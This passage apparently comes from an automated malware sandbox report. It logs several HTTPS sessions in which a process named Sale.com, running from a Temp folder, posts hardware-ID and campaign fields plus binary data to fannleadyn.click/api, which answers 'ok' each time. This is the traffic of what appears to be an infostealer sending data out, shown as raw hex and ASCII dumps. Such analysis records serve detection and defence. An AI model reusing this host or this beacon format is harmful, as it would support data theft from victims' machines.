                                              2024-12-24 07:58:42 UTC1369INData Raw: 4f 77 4f 58 44 2b 57 44 46 63 43 68 51 75 66 51 4a 56 6a 4a 33 7a 2f 56 38 63 34 72 2b 4b 5a 69 6f 46 4d 77 6f 69 48 6b 75 53 37 37 6f 79 4e 36 6b 64 63 68 56 4a 45 6a 77 30 56 68 71 71 6c 4f 72 37 41 31 53 6a 6f 63 39 79 5a 67 49 79 52 33 42 66 51 70 58 6d 76 54 67 7a 71 52 73 67 57 67 38 48 4a 48 6b 45 53 49 47 53 35 50 70 56 41 2b 43 34 68 32 41 71 46 7a 63 48 4b 78 51 43 30 61 4f 77 4c 58 44 2b 57 42 46 4d 48 78 38 6a 65 42 68 52 69 70 72 33 2b 6b 68 4f 72 66 36 51 62 44 64 46 5a 68 45 34 43 45 57 41 72 61 35 31 4e 36 70 59 61 68 73 50 48 43 4a 7a 43 46 53 5a 6e 4f 66 34 56 77 66 71 75 6f 6c 6f 4a 67 45 36 41 43 30 63 54 70 54 6b 74 44 6f 30 72 78 59 37 56 45 6c 62 5a 48 4d 57 47 74 50 5a 77 4f 78 62 41 75 37 2b 6e 69 55 2f 52 54 6b 4c 61 45 63 43 6b
                                              Data Ascii: OwOXD+WDFcChQufQJVjJ3z/V8c4r+KZioFMwoiHkuS77oyN6kdchVJEjw0VhqqlOr7A1Sjoc9yZgIyR3BfQpXmvTgzqRsgWg8HJHkESIGS5PpVA+C4h2AqFzcHKxQC0aOwLXD+WBFMHx8jeBhRipr3+khOrf6QbDdFZhE4CEWAra51N6pYahsPHCJzCFSZnOf4VwfquoloJgE6AC0cTpTktDo0rxY7VElbZHMWGtPZwOxbAu7+niU/RTkLaEcCk
                                              2024-12-24 07:58:42 UTC270INData Raw: 37 73 42 30 31 54 55 73 67 4a 33 6f 41 58 5a 33 5a 2f 73 67 57 54 75 4c 2b 32 56 49 2f 52 53 68 48 63 45 30 4d 33 2f 48 33 62 58 44 68 47 79 42 4a 44 78 59 79 64 30 6c 6b 74 62 37 33 2f 56 38 65 35 4b 6d 4f 4b 32 68 46 4d 55 64 77 4a 67 4b 57 35 4b 77 6b 4a 71 73 49 4e 52 73 32 57 32 52 73 54 67 4c 4c 72 4f 4c 35 56 67 6e 31 72 38 78 4d 4d 41 38 35 46 79 38 49 54 64 2b 74 39 7a 4e 77 2f 6b 74 38 47 77 30 45 5a 43 78 65 43 4e 44 4d 73 71 41 49 58 50 7a 77 6d 43 73 77 52 57 5a 56 5a 6c 39 51 33 37 76 33 63 6a 4f 30 43 6a 52 59 48 78 5a 6a 53 6a 42 39 6b 5a 54 6e 34 45 6b 77 33 62 6d 62 5a 69 41 53 4c 30 73 39 48 45 79 52 35 4b 46 31 66 75 59 58 63 67 4d 77 56 57 77 30 4d 52 54 4c 67 61 47 76 47 44 76 67 73 49 39 73 4d 42 52 7a 49 44 49 53 52 49 6a 79 39 33
                                              Data Ascii: 7sB01TUsgJ3oAXZ3Z/sgWTuL+2VI/RShHcE0M3/H3bXDhGyBJDxYyd0lktb73/V8e5KmOK2hFMUdwJgKW5KwkJqsINRs2W2RsTgLLrOL5Vgn1r8xMMA85Fy8ITd+t9zNw/kt8Gw0EZCxeCNDMsqAIXPzwmCswRWZVZl9Q37v3cjO0CjRYHxZjSjB9kZTn4Ekw3bmbZiASL0s9HEyR5KF1fuYXcgMwVWw0MRTLgaGvGDvgsI9sMBRzIDISRIjy93
                                              2024-12-24 07:58:42 UTC1369INData Raw: 33 32 62 37 0d 0a 4f 41 74 76 4c 75 71 49 4c 57 62 50 73 6e 69 55 2f 52 53 68 48 63 45 30 4d 33 2f 48 33 62 58 44 68 47 79 42 4a 44 78 59 79 64 30 6c 6b 74 62 66 6d 38 56 30 4a 38 2f 79 76 59 44 49 43 66 6b 6c 6f 45 41 4c 48 32 76 64 39 63 4a 6c 57 63 6b 4e 4a 54 57 52 42 44 56 53 46 6e 76 66 6d 46 53 44 6b 75 49 52 73 4e 6b 63 51 44 44 77 59 41 74 47 6a 73 58 56 6f 39 6c 5a 79 58 78 68 56 66 43 52 63 41 64 37 4b 74 71 63 4b 45 61 32 6e 77 58 31 6d 58 57 78 4a 61 41 30 43 78 36 50 77 4e 69 4b 30 48 6a 46 4e 43 6c 49 61 53 67 31 4d 68 70 62 71 39 6d 59 77 7a 62 4f 41 61 43 68 48 44 78 45 6c 44 30 47 61 35 49 6b 4c 50 71 45 4d 4e 56 55 50 46 57 51 36 54 6c 58 4c 77 64 69 33 45 45 37 63 38 4d 46 7a 5a 6c 31 2b 4d 69 73 52 54 4a 6a 31 70 6e 67 54 73 42 55 39
                                              Data Ascii: 32b7OAtvLuqILWbPsniU/RShHcE0M3/H3bXDhGyBJDxYyd0lktbfm8V0J8/yvYDICfkloEALH2vd9cJlWckNJTWRBDVSFnvfmFSDkuIRsNkcQDDwYAtGjsXVo9lZyXxhVfCRcAd7KtqcKEa2nwX1mXWxJaA0Cx6PwNiK0HjFNClIaSg1Mhpbq9mYwzbOAaChHDxElD0Ga5IkLPqEMNVUPFWQ6TlXLwdi3EE7c8MFzZl1+MisRTJj1pngTsBU9
                                              2024-12-24 07:58:42 UTC1369INData Raw: 51 73 54 68 32 49 69 2f 50 78 57 78 6a 67 2b 62 39 56 41 51 73 35 42 6a 34 50 54 35 50 43 74 43 51 36 6d 43 59 6e 57 41 63 62 49 32 49 66 47 73 58 5a 37 72 63 41 4e 36 50 32 77 56 52 6f 52 53 5a 48 63 46 39 33 6e 4f 32 35 4d 69 61 33 56 52 56 56 44 68 51 79 5a 41 4e 57 71 70 72 77 2f 52 68 41 6f 37 6a 42 4d 33 52 4c 66 67 4d 35 58 78 72 50 73 65 78 67 59 2f 46 49 59 45 52 48 44 47 52 69 54 67 4c 5a 31 36 48 6c 47 46 61 6a 2b 59 4a 35 4e 41 4d 39 45 53 74 59 66 4b 48 47 6f 44 59 67 6f 42 73 4d 5a 53 49 5a 49 6e 4d 55 58 59 32 2f 77 62 63 57 54 75 7a 2b 32 56 4a 6d 54 58 34 34 5a 6c 39 61 33 37 76 33 41 44 4f 6f 46 6a 56 4e 47 46 67 42 59 77 31 4b 6a 5a 71 68 75 52 67 49 6f 2b 62 52 4a 57 59 42 4c 30 64 77 54 78 44 45 74 75 52 69 59 50 51 48 66 45 4a 4a 41
                                              Data Ascii: QsTh2Ii/PxWxjg+b9VAQs5Bj4PT5PCtCQ6mCYnWAcbI2IfGsXZ7rcAN6P2wVRoRSZHcF93nO25Mia3VRVVDhQyZANWqprw/RhAo7jBM3RLfgM5XxrPsexgY/FIYERHDGRiTgLZ16HlGFaj+YJ5NAM9EStYfKHGoDYgoBsMZSIZInMUXY2/wbcWTuz+2VJmTX44Zl9a37v3ADOoFjVNGFgBYw1KjZqhuRgIo+bRJWYBL0dwTxDEtuRiYPQHfEJJA


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.649825104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:43 UTC279OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=LXZNGY6YLEDE7GU
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 12838
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:43 UTC12838OUTData Raw: 2d 2d 4c 58 5a 4e 47 59 36 59 4c 45 44 45 37 47 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 33 37 32 31 41 41 45 43 46 36 43 34 41 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4c 58 5a 4e 47 59 36 59 4c 45 44 45 37 47 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 58 5a 4e 47 59 36 59 4c 45 44 45 37 47 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 4c 58 5a 4e 47 59 36 59
                                              Data Ascii: --LXZNGY6YLEDE7GUContent-Disposition: form-data; name="hwid"F253721AAECF6C4A2A161345CD0A71E7--LXZNGY6YLEDE7GUContent-Disposition: form-data; name="pid"2--LXZNGY6YLEDE7GUContent-Disposition: form-data; name="lid"jMw1IE--l3--LXZNGY6Y
                                              2024-12-24 07:58:44 UTC1133INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=091g04q44p1ef7lpout0crrg0f; expires=Sat, 19 Apr 2025 01:45:23 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMsje%2BEbnsHQ%2BjnJJJKIkcMFMI8oQ6nbqjoptXBCYtA%2FUMb21vouMxzg%2FhphMwBK3qV9noYZyvOzNcyGrutB23qxfz5HqHf0FtA%2FvEG%2Fmj4Bp5WTGVEuqNY%2BJrYKoeLDbPGw"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c438b334314-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1706&rtt_var=645&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13775&delivery_rate=1689814&cwnd=188&unsent_bytes=0&cid=cf67ae08dddc862b&ts=1043&x=0"
                                              2024-12-24 07:58:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                              Data Ascii: fok 8.46.123.189
                                              2024-12-24 07:58:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.649832104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:46 UTC277OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=6LQUJTI9HZLS6
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 15072
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:46 UTC15072OUTData Raw: 2d 2d 36 4c 51 55 4a 54 49 39 48 5a 4c 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 33 37 32 31 41 41 45 43 46 36 43 34 41 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 36 4c 51 55 4a 54 49 39 48 5a 4c 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4c 51 55 4a 54 49 39 48 5a 4c 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 36 4c 51 55 4a 54 49 39 48 5a 4c 53 36 0d
                                              Data Ascii: --6LQUJTI9HZLS6Content-Disposition: form-data; name="hwid"F253721AAECF6C4A2A161345CD0A71E7--6LQUJTI9HZLS6Content-Disposition: form-data; name="pid"2--6LQUJTI9HZLS6Content-Disposition: form-data; name="lid"jMw1IE--l3--6LQUJTI9HZLS6
                                              2024-12-24 07:58:46 UTC1119INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=7qvfmkiov28h2r0sv768i5javt; expires=Sat, 19 Apr 2025 01:45:25 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4P7TXXytxVzE0RxQcmNMrNilGBJA0xk5KDsskk33OiEYPxVBReppUDnntroX6OvguB8mr4YNvY7nunzCusPb4n429a4aRny3pupO6DqcjQAnc012h8WXbXea22B9kPCokDci"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c531dafc359-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1475&min_rtt=1469&rtt_var=563&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16007&delivery_rate=1921052&cwnd=234&unsent_bytes=0&cid=3cceddfe7940017a&ts=883&x=0"
                                              2024-12-24 07:58:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                              Data Ascii: fok 8.46.123.189
                                              2024-12-24 07:58:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.649838104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:48 UTC281OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=O6UTHR9H31VR2GK8O
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 19954
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:48 UTC15331OUTData Raw: 2d 2d 4f 36 55 54 48 52 39 48 33 31 56 52 32 47 4b 38 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 33 37 32 31 41 41 45 43 46 36 43 34 41 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4f 36 55 54 48 52 39 48 33 31 56 52 32 47 4b 38 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 36 55 54 48 52 39 48 33 31 56 52 32 47 4b 38 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 4f 36
                                              Data Ascii: --O6UTHR9H31VR2GK8OContent-Disposition: form-data; name="hwid"F253721AAECF6C4A2A161345CD0A71E7--O6UTHR9H31VR2GK8OContent-Disposition: form-data; name="pid"3--O6UTHR9H31VR2GK8OContent-Disposition: form-data; name="lid"jMw1IE--l3--O6
                                              2024-12-24 07:58:48 UTC4623OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49
                                              Data Ascii: +?2+?2+?o?Mp5p_oI
                                              2024-12-24 07:58:49 UTC1127INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=v8e8po713qmvq9nkqu2ka4rctb; expires=Sat, 19 Apr 2025 01:45:27 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHjDXhQdPYJpjA%2FDVRRWLREtnUZXPPHElEs9m5FfyxQ9sGdUSW%2BYhVVIkJRqeIqOglqDgGgePF%2FX9Olr%2BRA4H39ekCSHXAJSOvs7ASdhlAVr2w7E2SD1vSukJMwzE1OZwDGf"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c60a939c445-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1492&rtt_var=567&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=20915&delivery_rate=1917268&cwnd=227&unsent_bytes=0&cid=655820156af84b70&ts=949&x=0"
                                              2024-12-24 07:58:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                              Data Ascii: fok 8.46.123.189
                                              2024-12-24 07:58:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.649845104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:50 UTC282OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=4BMP850K5QEDXVP8FNI
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 5479
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:50 UTC5479OUTData Raw: 2d 2d 34 42 4d 50 38 35 30 4b 35 51 45 44 58 56 50 38 46 4e 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 33 37 32 31 41 41 45 43 46 36 43 34 41 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 34 42 4d 50 38 35 30 4b 35 51 45 44 58 56 50 38 46 4e 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 42 4d 50 38 35 30 4b 35 51 45 44 58 56 50 38 46 4e 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33
                                              Data Ascii: --4BMP850K5QEDXVP8FNIContent-Disposition: form-data; name="hwid"F253721AAECF6C4A2A161345CD0A71E7--4BMP850K5QEDXVP8FNIContent-Disposition: form-data; name="pid"1--4BMP850K5QEDXVP8FNIContent-Disposition: form-data; name="lid"jMw1IE--l3
                                              2024-12-24 07:58:51 UTC1123INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=hnrhe6bqlofmcsohrd2d496j49; expires=Sat, 19 Apr 2025 01:45:30 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UuQn4gO6zlLMF5R9xxbilYhObU81ra%2FLhpkIn04miMoDVXJiP4EOynhdBJyKb6tGYHjJ9rC2oxalCYP%2BdaOgf%2BGd8GoDxKpdYQ7TiCt7qkp32515OZeNEPRa0gpBwBoLJ3Jx"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c6fc8de0f81-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1488&min_rtt=1482&rtt_var=568&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2840&recv_bytes=6397&delivery_rate=1907250&cwnd=239&unsent_bytes=0&cid=eb03fa2a59e20b20&ts=772&x=0"
                                              2024-12-24 07:58:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                              Data Ascii: fok 8.46.123.189
                                              2024-12-24 07:58:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.649852104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:52 UTC279OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=O2J82P19XF4SA63K
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 1204
                                              Host: fannleadyn.click
                                              2024-12-24 07:58:52 UTC1204OUTData Raw: 2d 2d 4f 32 4a 38 32 50 31 39 58 46 34 53 41 36 33 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 33 37 32 31 41 41 45 43 46 36 43 34 41 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4f 32 4a 38 32 50 31 39 58 46 34 53 41 36 33 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 32 4a 38 32 50 31 39 58 46 34 53 41 36 33 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 4f 32 4a 38 32
                                              Data Ascii: --O2J82P19XF4SA63KContent-Disposition: form-data; name="hwid"F253721AAECF6C4A2A161345CD0A71E7--O2J82P19XF4SA63KContent-Disposition: form-data; name="pid"1--O2J82P19XF4SA63KContent-Disposition: form-data; name="lid"jMw1IE--l3--O2J82
                                              2024-12-24 07:58:53 UTC1130INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=ldoffuc961j4gtjdrlns9csm3u; expires=Sat, 19 Apr 2025 01:45:32 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r8IJ66nFXXcLSO1eGeaQgCeM1MX%2BM1I4JrOJ%2Bf55B4qI%2B1NtCR0mQtDikLgvZ8f9%2FM4YX9xC%2B%2BQ%2B0blrviROnujEBXKiblKW3bJCY2AbhJooEi33fPLHquuD20pSEqdJz4sN"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c7c6c3943ee-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2032&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2119&delivery_rate=1407228&cwnd=230&unsent_bytes=0&cid=2f8a4ac8557c74b8&ts=800&x=0"
                                              2024-12-24 07:58:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                              Data Ascii: fok 8.46.123.189
                                              2024-12-24 07:58:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.649860104.21.63.2294434512C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              TimestampBytes transferredDirectionData
                                              2024-12-24 07:58:55 UTC276OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=NB4WC9ZEWLC
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 579632
                                              Host: fannleadyn.click
